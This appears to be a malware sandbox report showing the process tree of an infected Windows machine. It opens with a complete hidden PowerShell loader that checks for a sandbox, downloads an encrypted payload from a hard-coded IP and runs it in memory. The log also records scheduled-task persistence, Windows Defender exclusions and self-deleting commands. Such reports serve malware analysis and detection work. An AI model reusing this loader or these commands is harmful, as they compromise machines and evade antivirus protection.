"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $typiconBooties = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $elidesDiggers = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NDU5MzQ=')); $agentsTypicon = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('M2EyNWE=')); $elidesBooties = new-object System.Net.Sockets.TcpClient; $elidesBooties.Connect($typiconBooties, [int]$elidesDiggers); $moniasBecram = $elidesBooties.GetStream(); $elidesBooties.SendTimeout = 300000; $elidesBooties.ReceiveTimeout = 300000; $lingasElides = [System.Text.StringBuilder]::new(); $lingasElides.AppendLine('GET /' + $agentsTypicon); $lingasElides.AppendLine('Host: ' + $typiconBooties); $lingasElides.AppendLine(); $bootiesMonias = [System.Text.Encoding]::ASCII.GetBytes($lingasElides.ToString()); $moniasBecram.Write($bootiesMonias, 0, $bootiesMonias.Length); $moniasAgents = New-Object System.IO.MemoryStream; $moniasBecram.CopyTo($moniasAgents); $moniasBecram.Dispose(); $elidesBooties.Dispose(); $moniasAgents.Position = 0; $bootiesDiggers = $moniasAgents.ToArray(); $moniasAgents.Dispose(); $lingasAgents = [System.Text.Encoding]::ASCII.GetString($bootiesDiggers).IndexOf('`r`n`r`n')+1; $lingasTypicon = [System.Text.Encoding]::ASCII.GetString($bootiesDiggers[$lingasAgents..($bootiesDiggers.Length-1)]); $lingasTypicon = [System.Convert]::FromBase64String($lingasTypicon); $diggersCuittle = New-Object System.Security.Cryptography.AesManaged; $diggersCuittle.Mode = [System.Security.Cryptography.CipherMode]::CBC; $diggersCuittle.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $diggersCuittle.Key = [System.Convert]::FromBase64String('bTBxHoHlsFE1FusIuQOatttX0kgSSC4OKDkQ+IjagWQ='); $diggersCuittle.IV = [System.Convert]::FromBase64String('VB4EnrJD2qF3uAbX2nckFA=='); $typiconMonias = $diggersCuittle.CreateDecryptor(); $lingasTypicon = $typiconMonias.TransformFinalBlock($lingasTypicon, 0, $lingasTypicon.Length); $typiconMonias.Dispose(); $diggersCuittle.Dispose(); $agentsBecram = New-Object System.IO.MemoryStream(, $lingasTypicon); $cristiDiggers = New-Object System.IO.MemoryStream; $diggersMonias = New-Object System.IO.Compression.GZipStream($agentsBecram, [IO.Compression.CompressionMode]::Decompress); $diggersMonias.CopyTo($cristiDiggers); $lingasTypicon = $cristiDiggers.ToArray(); $agentsBooties = [System.Reflection.Assembly]::Load($lingasTypicon); $moniasDiggers = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZmlzdHVjYUZyYWdoYW4=')); $elidesMonias = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bGluZ2FzQ3VpdHRsZQ==')); $bootiesAgents = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Ym9vdGllc0VsaWRlcw==')); $bootiesCristi = $agentsBooties.GetType($moniasDiggers + '.' + $elidesMonias); $elidesLingas = $bootiesCristi.GetMethod($bootiesAgents); $elidesLingas.Invoke($cuittleBooties, (, [string[]] ('C:\Users\Admin\AppData\Roaming\NCH Software\DrawPad\DpEditor.exe'))); #($cuittleBooties, $cuittleBooties);
6⤵
PID:4808

C:\Users\Admin\AppData\Roaming\NCH Software\DrawPad\DpEditor.exe
"C:\Users\Admin\AppData\Roaming\NCH Software\DrawPad\DpEditor.exe"
7⤵
PID:2736

C:\Users\Admin\AppData\Roaming\NCH Software\DrawPad\DpEditor.exe
"C:\Users\Admin\AppData\Roaming\NCH Software\DrawPad\DpEditor.exe"
7⤵
PID:2468

C:\Users\Admin\AppData\Local\Temp\a\originalbuild.exe
C:\Users\Admin\AppData\Local\Temp\a\originalbuild.exe
4⤵
PID:6004

C:\Users\Admin\AppData\Local\Temp\a\originalbuild.exe
C:\Users\Admin\AppData\Local\Temp\a\originalbuild.exe
4⤵
PID:5972

C:\Users\Admin\AppData\Local\Temp\a\originalbuild.exe
C:\Users\Admin\AppData\Local\Temp\a\originalbuild.exe
4⤵
PID:6136

C:\Users\Admin\AppData\Local\Temp\a\originalbuild.exe
C:\Users\Admin\AppData\Local\Temp\a\originalbuild.exe
4⤵
PID:4980

C:\Users\Admin\AppData\Local\Temp\a\forscan.exe
"C:\Users\Admin\AppData\Local\Temp\a\forscan.exe"
2⤵
PID:4980

C:\Users\Admin\AppData\Local\Temp\applauncheerrr.exe
"C:\Users\Admin\AppData\Local\Temp\applauncheerrr.exe"
3⤵
PID:4708

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4980 -s 228
3⤵
- Program crash
PID:5884

C:\Users\Admin\AppData\Local\Temp\a\Had.exe
"C:\Users\Admin\AppData\Local\Temp\a\Had.exe"
2⤵
PID:4844

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
3⤵
PID:4724

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe"
3⤵
PID:800

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe"
3⤵
PID:4848

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe"
3⤵
PID:4876

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:1680

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe"
3⤵
PID:3592

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
3⤵
PID:3672

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
3⤵
PID:4404

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe"
3⤵
PID:4696

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe"
3⤵
PID:4800

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
3⤵
PID:5096

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
3⤵
PID:948

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe"
3⤵
PID:2860

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe"
3⤵
PID:4700

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
3⤵
PID:2108

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe"
3⤵
PID:2124

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"
3⤵
PID:3544

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
3⤵
PID:1840

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe"
3⤵
PID:212

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe"
3⤵
PID:3220

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"
3⤵
PID:2736

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"
3⤵
PID:4004

C:\Users\Admin\AppData\Local\Temp\a\123.exe
"C:\Users\Admin\AppData\Local\Temp\a\123.exe"
2⤵
PID:432

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
3⤵
PID:3264

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
3⤵
PID:2248

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe"
3⤵
PID:3940

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe"
3⤵
PID:5152

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
3⤵
PID:5140

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe"
3⤵
PID:5128

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
3⤵
PID:3660

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe"
3⤵
PID:4688

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe"
3⤵
PID:4124

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"
3⤵
PID:1628

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe"
3⤵
PID:1624

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
3⤵
PID:3828

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:4496

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe"
3⤵
PID:4252

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe"
3⤵
PID:1452

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"
3⤵
PID:4276

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
3⤵
PID:4500

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
3⤵
PID:4128

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
3⤵
PID:5064

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
3⤵
PID:4416

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe"
3⤵
PID:3420

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe"
3⤵
PID:3348

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe"
3⤵
PID:4136

C:\Users\Admin\AppData\Local\Temp\a\vbc (5).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (5).exe"
2⤵
PID:820

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:2764

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:4308

C:\Users\Admin\AppData\Local\Temp\a\olotiiss.exe
"C:\Users\Admin\AppData\Local\Temp\a\olotiiss.exe"
2⤵
PID:4012

C:\Users\Admin\AppData\Local\Temp\a\olotiiss.exe
"C:\Users\Admin\AppData\Local\Temp\a\olotiiss.exe"
3⤵
PID:6016

C:\Users\Admin\AppData\Local\Temp\a\obi.exe
"C:\Users\Admin\AppData\Local\Temp\a\obi.exe"
2⤵
PID:5164

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rqrBaKxCBepz" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE75D.tmp"
3⤵
- Creates scheduled task(s)
PID:5076

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
3⤵
PID:5144

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
3⤵
PID:6048

C:\Users\Admin\AppData\Local\Temp\a\ghjkl.exe
"C:\Users\Admin\AppData\Local\Temp\a\ghjkl.exe"
2⤵
PID:5396

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQA1AA==
3⤵
PID:5772

C:\Users\Admin\AppData\Local\Temp\Uaohplnznpqjblablyawgradz.exe
"C:\Users\Admin\AppData\Local\Temp\Uaohplnznpqjblablyawgradz.exe"
3⤵
PID:5924

C:\Users\Admin\AppData\Local\Temp\Uaohplnznpqjblablyawgradz.exe
C:\Users\Admin\AppData\Local\Temp\Uaohplnznpqjblablyawgradz.exe
4⤵
PID:3668

C:\Users\Admin\AppData\Local\Temp\Uaohplnznpqjblablyawgradz.exe
C:\Users\Admin\AppData\Local\Temp\Uaohplnznpqjblablyawgradz.exe
4⤵
PID:4352

C:\Users\Admin\AppData\Local\Temp\Uaohplnznpqjblablyawgradz.exe
C:\Users\Admin\AppData\Local\Temp\Uaohplnznpqjblablyawgradz.exe
4⤵
PID:3664

C:\Users\Admin\AppData\Local\Temp\a\ghjkl.exe
C:\Users\Admin\AppData\Local\Temp\a\ghjkl.exe
3⤵
PID:5040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 632
4⤵
- Program crash
PID:3668

C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe
"C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe"
2⤵
PID:5500

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQA1AA==
3⤵
PID:5964

C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe
C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe
3⤵
PID:5652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5652 -s 476
4⤵
- Program crash
PID:5920

C:\Users\Admin\AppData\Local\Temp\a\blessedjayzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\blessedjayzx.exe"
2⤵
PID:5552

C:\Users\Admin\AppData\Local\Temp\a\blessedjayzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\blessedjayzx.exe"
3⤵
PID:2156

C:\Users\Admin\AppData\Local\Temp\a\morganzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\morganzx.exe"
2⤵
PID:5692

C:\Users\Admin\AppData\Local\Temp\a\morganzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\morganzx.exe"
3⤵
PID:4152

C:\Users\Admin\AppData\Local\Temp\a\morganzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\morganzx.exe"
3⤵
PID:2016

C:\Users\Admin\AppData\Local\Temp\a\morganzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\morganzx.exe"
3⤵
PID:5892

C:\Users\Admin\AppData\Local\Temp\a\test.exe
"C:\Users\Admin\AppData\Local\Temp\a\test.exe"
2⤵
PID:5796

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "test" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Nvidia\test.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a\test.exe" &&START "" "C:\Users\Admin\AppData\Local\Nvidia\test.exe"
3⤵
PID:6080

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:3504

C:\Windows\system32\PING.EXE
ping 127.0.0.1
4⤵
- Runs ping.exe
PID:2744

C:\Windows\system32\schtasks.exe
schtasks /create /tn "test" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Nvidia\test.exe" /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:8048

C:\Users\Admin\AppData\Local\Nvidia\test.exe
"C:\Users\Admin\AppData\Local\Nvidia\test.exe"
4⤵
PID:10032

C:\Users\Admin\AppData\Local\Temp\a\vbc (6).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (6).exe"
2⤵
PID:5940

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\vbc (6).exe"
3⤵
PID:4816

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NRxRXfYhgW" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7361.tmp"
3⤵
- Creates scheduled task(s)
PID:4556

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\NRxRXfYhgW.exe"
3⤵
PID:4680

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
3⤵
PID:5052

C:\Users\Admin\AppData\Local\Temp\a\test (2).exe
"C:\Users\Admin\AppData\Local\Temp\a\test (2).exe"
2⤵
PID:6120

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "test (2)" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Nvidia\test (2).exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a\test (2).exe" &&START "" "C:\Users\Admin\AppData\Local\Nvidia\test (2).exe"
3⤵
PID:4960

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:2056

C:\Windows\system32\PING.EXE
ping 127.0.0.1
4⤵
- Runs ping.exe
PID:952

C:\Windows\system32\schtasks.exe
schtasks /create /tn "test (2)" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Nvidia\test (2).exe" /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:9412

C:\Users\Admin\AppData\Local\Nvidia\test (2).exe
"C:\Users\Admin\AppData\Local\Nvidia\test (2).exe"
4⤵
PID:9784

C:\Users\Admin\AppData\Local\Temp\a\123 (2).exe
"C:\Users\Admin\AppData\Local\Temp\a\123 (2).exe"
2⤵
PID:1412

C:\Users\Admin\AppData\Local\Temp\a\123 (2).exe
"C:\Users\Admin\AppData\Local\Temp\a\123 (2).exe"
3⤵
PID:5892

C:\Users\Admin\AppData\Local\Temp\a\fotocr23.exe
"C:\Users\Admin\AppData\Local\Temp\a\fotocr23.exe"
2⤵
PID:5304

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y2279810.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y2279810.exe
3⤵
PID:4032

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\y4658634.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\y4658634.exe
4⤵
PID:4128

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\k3499898.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\k3499898.exe
5⤵
PID:5220

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\l4148907.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\l4148907.exe
5⤵
PID:3044

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\m5795579.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\m5795579.exe
4⤵
PID:5924

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\n1324447.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\n1324447.exe
3⤵
PID:712

C:\Users\Admin\AppData\Local\Temp\a\foto0174.exe
"C:\Users\Admin\AppData\Local\Temp\a\foto0174.exe"
2⤵
PID:4248

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\x4975272.exe
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\x4975272.exe
3⤵
PID:5376

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\x9184178.exe
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\x9184178.exe
4⤵
PID:4856

C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\f7551753.exe
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\f7551753.exe
5⤵
PID:5512

C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\g7326897.exe
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\g7326897.exe
5⤵
PID:4320

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\h0961570.exe
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\h0961570.exe
4⤵
PID:5772

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\i0192481.exe
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\i0192481.exe
3⤵
PID:5428

C:\Users\Admin\AppData\Local\Temp\a\vbc (7).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (7).exe"
2⤵
PID:2456

C:\Users\Admin\AppData\Local\Temp\a\vbc (7).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (7).exe"
3⤵
PID:372

C:\Users\Admin\AppData\Local\Temp\a\vbc (7).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (7).exe"
3⤵
PID:4860

C:\Users\Admin\AppData\Local\Temp\a\vbc (7).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (7).exe"
3⤵
PID:1356

C:\Users\Admin\AppData\Local\Temp\a\vbc (7).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (7).exe"
3⤵
PID:3264

C:\Users\Admin\AppData\Local\Temp\a\vbc (8).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (8).exe"
2⤵
PID:5252

C:\Users\Admin\AppData\Local\Temp\a\cryptedclient1.exe
"C:\Users\Admin\AppData\Local\Temp\a\cryptedclient1.exe"
2⤵
PID:3660

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANQAxAA==
3⤵
PID:6684

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
3⤵
PID:8792

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
3⤵
PID:6292

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
3⤵
PID:8548

C:\Users\Admin\AppData\Local\Temp\a\SCMB.exe
"C:\Users\Admin\AppData\Local\Temp\a\SCMB.exe"
2⤵
PID:4440

C:\Users\Admin\AppData\Local\Temp\a\bebra.exe
"C:\Users\Admin\AppData\Local\Temp\a\bebra.exe"
2⤵
PID:6052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\bebra.exe
3⤵
PID:6624

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
4⤵
PID:7864

C:\Users\Admin\AppData\Local\Temp\a\loaderx.exe
"C:\Users\Admin\AppData\Local\Temp\a\loaderx.exe"
2⤵
PID:4312

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANAA1AA==
3⤵
PID:3988

C:\Users\Admin\AppData\Local\Temp\a\setup.exe
"C:\Users\Admin\AppData\Local\Temp\a\setup.exe"
2⤵
PID:1780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 688
3⤵
- Program crash
PID:5536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 788
3⤵
- Program crash
PID:1216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 852
3⤵
- Program crash
PID:5380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 900
3⤵
- Program crash
PID:5496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 980
3⤵
- Program crash
PID:4500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 1060
3⤵
- Program crash
PID:6568

C:\Users\Admin\AppData\Local\Temp\a\s.exe
"C:\Users\Admin\AppData\Local\Temp\a\s.exe"
2⤵
PID:5160

C:\Users\Admin\AppData\Local\Temp\a\build (2).exe
"C:\Users\Admin\AppData\Local\Temp\a\build (2).exe"
2⤵
PID:5012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\build (2).exe
3⤵
PID:5772

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
4⤵
PID:7388

C:\Users\Admin\AppData\Local\Temp\a\ppls25.exe
"C:\Users\Admin\AppData\Local\Temp\a\ppls25.exe"
2⤵
PID:1380

C:\Users\Admin\AppData\Local\Temp\a\rmns.exe
"C:\Users\Admin\AppData\Local\Temp\a\rmns.exe"
2⤵
PID:3360

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /IM cliconfg.exe /F
3⤵
PID:4136

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM cliconfg.exe /F
4⤵
- Kills process with taskkill
PID:3892

C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe
"C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe"
2⤵
PID:5416

C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe
"C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe"
3⤵
PID:1980

C:\Users\Admin\AppData\Local\Temp\a\WSearch136Estcott.exe
"C:\Users\Admin\AppData\Local\Temp\a\WSearch136Estcott.exe"
2⤵
PID:5584

C:\Program Files (x86)\LuckyWheel\LuckyWheel.exe
"C:\Program Files (x86)\LuckyWheel\LuckyWheel.exe"
3⤵
PID:1744

C:\Program Files (x86)\LuckyWheel\newpab.exe
"C:\Program Files (x86)\LuckyWheel\newpab.exe"
4⤵
PID:7932

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Program Files (x86)\LuckyWheel\newpab.exe" & exit
5⤵
PID:6696

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
6⤵
- Delays execution with timeout.exe
PID:7768

